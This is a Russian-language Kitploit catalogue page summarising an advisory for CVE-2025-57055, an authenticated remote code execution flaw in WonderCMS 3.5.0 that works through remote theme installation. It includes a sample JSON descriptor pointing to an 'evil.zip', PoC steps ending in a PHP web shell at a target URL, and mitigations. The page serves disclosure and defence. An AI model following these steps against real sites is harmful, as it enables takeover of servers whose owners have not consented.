Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-57055 — Эксплойт аутентифицированного RCE для WonderCMS 3.5.0 через вредоносную установку темы. Включает механику уязвимости, PoC и рекомендации по смягчению последствий для тестирования безопасности и обучения. | Kitploit
Инструменты/GitHubGitHub/thawphone/cve-2025-57055
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubthawphone/cve-2025-57055

CVE-2025-57055

Эксплойт аутентифицированного RCE для WonderCMS 3.5.0 через вредоносную установку темы. Включает механику уязвимости, PoC и рекомендации по смягчению последствий для тестирования безопасности и обучения.

Репозиторий
0 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-57055: Аутентифицированное удаленное выполнение кода в WonderCMS 3.5.0

Механизм уязвимости

Аутентифицированная уязвимость удаленного выполнения кода (RCE) существует в WonderCMS v3.5.0.

Проблема связана с тем, как приложение обрабатывает удаленные установки тем/модулей через JSON-дескрипторы. Когда администратор отправляет удаленный JSON-файл, ссылающийся на ZIP-архив, его содержимое извлекается в веб-доступную директорию (например, /themes/). Если ZIP-архив содержит PHP-файл, этот файл становится доступным через веб и может быть выполнен.

Такое поведение создает риск RCE из-за:

  • Отсутствия проверки или санитизации содержимого ZIP.
  • Отсутствия ограничений на типы файлов, извлекаемых из удаленных источников.
  • Веб-доступности директорий тем/плагинов.

Примечание: Требуется аутентификация администратора, но установки по умолчанию публично раскрывают пароль администратора (на главной странице), используют только пароль для входа и не применяют строгие средства контроля аутентификации.

Критерии принятия удаленных дескрипторов модулей/тем

WonderCMS примет и попытается установить удаленные модули/темы, если отправленный JSON-дескриптор соответствует ожидаемому формату wcms-modules.json. Дескриптор, прошедший проверку формата (и указывающий на ZIP-архив), будет получен, а его содержимое архива будет извлечено в веб-доступную директорию (например, ) без дальнейшей проверки типов файлов.

/themes/<name>/

Пример дескриптора:

root@kitploit:~
{
  "themes": {
    "SSRF": {
      "name": "FAKE",
      "repo": "https://example.com/",
      "zip": "https://example.com/evil.zip",
      "summary": "test",
      "version": "1.0.0",
      "image": "https://example.com/fake.png"
    }
  }
}

Доказательство концепции (PoC)

Предупреждение: Не запускайте на производственных системах. Используйте только авторизованные тестовые среды.

  1. Получите пароль администратора с публично доступной главной страницы установки WonderCMS по умолчанию.

  2. Войдите в панель администратора.

  3. Перейдите в раздел установки тем.

  4. Укажите URL вредоносного JSON-дескриптора (например, размещенного на сервере, контролируемом атакующим).

  5. Запустите установку. Сервер:

    • получит дескриптор.
    • загрузит указанный ZIP-архив.
  6. Установит загруженную вредоносную тему.

  7. Получите доступ к извлеченной PHP-оболочке (например, http://target.com/themes/<Theme_Name>/shell.php) для выполнения произвольных команд.

(Примечание: Выполняйте эти шаги только в контролируемой тестовой среде. Эксплуатация этой уязвимости на живых системах без разрешения незаконна.)

Ответ разработчика

  • Уязвимость была сообщена разработчикам WonderCMS в июле 2025 года.
  • Разработчики подтвердили получение отчета, но отметили, что, по их мнению, такое поведение приемлемо для администраторов.

Рекомендации по смягчению

Для снижения риска:

  • Ограничьте возможности удаленной установки доверенными источниками (например, только GitHub).
  • Проверяйте и санитируйте содержимое ZIP перед извлечением.
  • Укрепите аутентификацию:
    • Скрывайте пароль администратора после установки.
    • Применяйте вход по имени пользователя/паролю.
    • Включите многофакторную аутентификацию (если доступно).
  • Предотвратите доступ к исполняемым файлам внутри themes/ или plugins/ с помощью конфигурации сервера.

Ссылки

  • WonderCMS GitHub
  • OWASP A05:2021 – Ошибочная конфигурация безопасности
  • CWE-434 – Неограниченная загрузка файла опасного типа

Отказ от ответственности

Эта информация предоставлена для исследований в области защитной безопасности и в образовательных целях. Всегда получайте надлежащее разрешение перед тестированием или раскрытием уязвимостей.

Скачать инструмент